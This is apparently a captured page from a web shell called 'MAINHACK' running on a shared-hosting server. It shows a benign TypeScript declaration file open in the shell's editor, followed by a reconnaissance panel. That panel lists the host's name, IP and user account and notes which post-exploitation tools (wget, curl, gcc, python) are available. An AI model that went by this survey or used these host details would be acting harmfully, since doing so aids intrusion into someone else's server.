[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ChildExecutorDecision.d.ts
/** * @since 2.0.0 * @category symbols */ export declare const ChildExecutorDecisionTypeId: unique symbol; /** * @since 2.0.0 * @category symbols */ export type ChildExecutorDecisionTypeId = typeof ChildExecutorDecisionTypeId; /** * @since 2.0.0 * @category models */ export type ChildExecutorDecision = Continue | Close | Yield; /** * @since 2.0.0 */ export declare namespace ChildExecutorDecision { /** * @since 2.0.0 * @category models */ interface Proto { readonly [ChildExecutorDecisionTypeId]: ChildExecutorDecisionTypeId; } } /** * Continue executing the current substream * * @since 2.0.0 * @category models */ export interface Continue extends ChildExecutorDecision.Proto { readonly _tag: "Continue"; } /** * Close the current substream with a given value and pass execution to the * next substream * * @since 2.0.0 * @category models */ export interface Close extends ChildExecutorDecision.Proto { readonly _tag: "Close"; readonly value: unknown; } /** * Pass execution to the next substream. This either pulls a new element * from upstream, or yields to an already created active substream. * * @since 2.0.0 * @category models */ export interface Yield extends ChildExecutorDecision.Proto { readonly _tag: "Yield"; } /** * @since 2.0.0 * @category constructors */ export declare const Continue: (_: void) => ChildExecutorDecision; /** * @since 2.0.0 * @category constructors */ export declare const Close: (value: unknown) => ChildExecutorDecision; /** * @since 2.0.0 * @category constructors */ export declare const Yield: (_: void) => ChildExecutorDecision; /** * Returns `true` if the specified value is a `ChildExecutorDecision`, `false` * otherwise. * * @since 2.0.0 * @category refinements */ export declare const isChildExecutorDecision: (u: unknown) => u is ChildExecutorDecision; /** * Returns `true` if the specified `ChildExecutorDecision` is a `Continue`, * `false` otherwise. * * @since 2.0.0 * @category refinements */ export declare const isContinue: (self: ChildExecutorDecision) => self is Continue; /** * Returns `true` if the specified `ChildExecutorDecision` is a `Close`, `false` * otherwise. * * @since 2.0.0 * @category refinements */ export declare const isClose: (self: ChildExecutorDecision) => self is Close; /** * Returns `true` if the specified `ChildExecutorDecision` is a `Yield`, `false` * otherwise. * * @since 2.0.0 * @category refinements */ export declare const isYield: (self: ChildExecutorDecision) => self is Yield; /** * Folds over a `ChildExecutorDecision` to produce a value of type `A`. * * @since 2.0.0 * @category folding */ export declare const match: { /** * Folds over a `ChildExecutorDecision` to produce a value of type `A`. * * @since 2.0.0 * @category folding */ <A>(options: { readonly onContinue: () => A; readonly onClose: (value: unknown) => A; readonly onYield: () => A; }): (self: ChildExecutorDecision) => A; /** * Folds over a `ChildExecutorDecision` to produce a value of type `A`. * * @since 2.0.0 * @category folding */ <A>(self: ChildExecutorDecision, options: { readonly onContinue: () => A; readonly onClose: (value: unknown) => A; readonly onYield: () => A; }): A; }; //# sourceMappingURL=ChildExecutorDecision.d.ts.map
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.83 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344